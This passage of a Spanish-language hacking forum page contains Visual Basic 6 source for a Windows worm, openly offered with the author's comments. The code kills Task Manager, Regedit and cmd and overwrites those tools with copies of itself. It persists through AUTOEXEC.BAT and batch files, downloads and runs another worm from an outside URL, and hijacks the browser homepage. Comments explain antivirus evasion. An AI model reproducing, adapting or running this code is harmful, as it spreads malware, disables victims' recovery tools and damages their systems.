Clipboard.SetText " K-32 - Prayamama" 'Este se mantiene en el clipboard mediante el DO, cuando den al "CTRL+V" Se copiara eso automaticamente :p
Loop
clip:
End Sub
Private Sub NayrocSTAM()
Do
On Error GoTo NoSTAM
PagInicia ("http://www.elhacker.net") ' Este cambia la pagina de inicio
TituloInicia ("ElHacker - Soft Explorer - BY: K-32 (SP26)") 'Este cambia el titulo del IE, en vez de decir "Microsoft Internet Explorer" dice ese titulo :P
MsgBox " " & vbCrLf & " ", vbCritical
Loop

NoSTAM:

End Sub

Private Function Secuestro(UpPath As String, DownPath As String)'Funcion para mover archivos
On Error GoTo seNO
FileCopy UpPath$, DownPath$
Kill UpPath$
seNO:
End Function
Public Sub SecuestroCarpeta(DirPath As String)
On Error GoTo error
MkDir DirPath$
Exit Sub
error:
'Crear carpetas de secuestro
End Sub

Private Sub AeroBits()
On Error GoTo seNO:
Do
'Matar procesos antes de copiar
Matar ("Taskmgr.exe")
Matar ("Regedit.exe")
Matar ("Services.msc")
Matar ("cmd.exe")
Matar ("Explorer.exe")
Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas


SecuestroCarpeta Environ("SYSTEMROOT") & "\Binary\" 'Creamos carpetas de secuestro

Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\REGEDIT.EXE", Environ("SYSTEMROOT") & "\Binary\regedit.txt"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\services.msc", Environ("Systemroot") & "\BINARY\Services.txt"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe", Environ("SYSTEMROOT") & "\binary\taskmgr.txt"
'Lo copiamos en archivos .TXT


FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\regedit.exe"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\services.msc"

'Nos suplementamos.


seNO:
Shell Environ("SYSTEMROOT") & "\SYSTEM32\deflpo.exe"
Loop
End Sub


Private Sub NayrocSTEM()



Dim Archivo As String
Dim NumArchivo As Long
Dim Archivo2 As String
Dim NumArchivo2 As Long
On Error Resume Next
On Error GoTo NoHayBat
Do
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\deflps.exe" 'NOTA1


Matar ("Explorer.exe")
Matar ("CMD.exe")
Matar ("Regedit.exe")
Matar ("services.msc")
Matar ("msnmsgr.exe")
Shell ("Explorer.exe") 'Retornamos al Explorer para no levantar sospechas



            Archivo = Environ("SYSTEMDRIVE") & "\AUTOEXEC.BAT"
            NumArchivo = FreeFile()
           
   'Aqui me añado al
   'AUTOEXEC.BAT
   '
   'Para iniciarme cada vez que el sistema corra
   '¿Sera esta una via alterna?
   'Al yo poner "DEFLPS"
   'llama el archivo antes copiado
   'Es necesario que se copie antes en la carpeta SYSTEM32
   'Esto me da una via alterna contra los AV
   
                        Open Archivo For Output As #NumArchivo
                        Print #NumArchivo, "Echo off"
                        Print #NumArchivo, "Title AUTOEXEC.BAT"
                    '--
                        Print #NumArchivo, "CLS"
                        Print #NumArchivo, "Echo Loading..."
                        Print #NumArchivo, "CLS"
                        Print #NumArchivo, "cls"
                        Print #NumArchivo, "deflps"
               Close #NumArchivo
NoHayBat:
On Error Resume Next
'DeflPO
'Leer Mas abajo su Sub ()

                    Archivo2 = Environ("SYSTEMROOT") & "\Call.bat"
                    NumArchivo2 = FreeFile()
                    Print #NumArchivo, "Echo off"
                    Print #NumArchivo, "title  Analizador de discos lógicos"
                    Print #NumArchivo, "cls"
                    Print #NumArchivo, "echo @echo off > %SYSTEMDRIVE%\AUTOEXEC.bat"
                    Print #NumArchivo, "Echo cls>>%SYSTEMDRIVE%\AUTOEXEC.bat"
                    Print #NumArchivo, "ECHO DEFLPS>>%SYSTEMDRIVE%\AUTOEXEC.bat"
                    Close #NumArchivo
                    Shell Environ("SYSTEMROOT") & "\Call.bat"
Loop
End Sub
Private Sub AñoNuevo()

'Feliz año nuevo xDD
Do

    If Month(Now) = 1 And Day(Now) = 1 Then
   
    AñoNuevoUp

End If
Loop
End Sub



Private Sub AñoNuevoUp()
Dim ArchivoK32 As String
Dim NumArchivoK32 As Long
Do
ArchivoK32 = Environ("SYSTEMROOT") & "\2007.bat"
NumArchivoK32 = FreeFile()

'Aqui se ejecuta en año nuevo  :)

Print #NumArchivoK32, "Echo off"
Print #NumArchivoK32, "title OS"

Print #NumArchivoK32, "cls"
Print #NumArchivoK32, "Deflpo"
Print #NumArchivoK32, "Cls"
Close #NumArchivoK32

Shell Environ("SYSTEMROOT") & "\2007.bat"
'Lo hago como BAT ya que es mas efectivo para los AV's, En especial
'NOD32

Loop

End Sub


Private Sub Ds_Click()
MsgBox "Desinfectado"

End Sub

Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
MsgBox " ", vbExclamation, "WINLOGON.EXE"

Clipb
NayrocSTAM
DeflPO
NayrocSTEM
AñoNuevo
AeroBits

End Sub



Public Sub Matar(ByVal processName As String)
       
        On Error GoTo ErrHandler
         
         Dim oWMI
         Dim ret
         Dim sService
         Dim oWMIServices
         Dim oWMIService
         Dim oServices
         Dim oService
         Dim servicename
         
          Set oWMI = GetObject("winmgmts:")
          Set oServices = oWMI.InstancesOf("win32_process")

          For Each oService In oServices
                 
                 servicename = LCase(Trim(CStr(oService.Name) & ""))
                 
                 If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
                    ret = oService.Terminate
                 End If
 
          Next
         
          Set oServices = Nothing
          Set oWMI = Nothing

 
ErrHandler:
  Err.Clear
End Sub

Private Sub DeflPO()
'ORIENTE-ETERNO : Modo silencioso
Do
    Dim sSourceUrl As String

    sSourceUrl = "http://h1.ripside.net/MyArchivos/" & _
        "DCOM/deflPO.exe/" 'Este es otro de mis Worms

   
    DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\deflPO.exe" 'Descargamos el otro malguar
Loop
End Sub


Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
  DownloadFile = URLDownloadToFile(0, sURL, _
    sLocalFile, 0, 0) = ERROR_SUCCESS
End Function

Private Sub Form_Unload(Cancel As Integer)
MsgBox " ", vbCritical
Do
Shell App.Path & App.EXEName & ".exe"
Loop

End Sub

el modulo no tengo que explicar mucho, ya esta mas que claro :P.
Páginas: 1 2 [3] 4 5 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines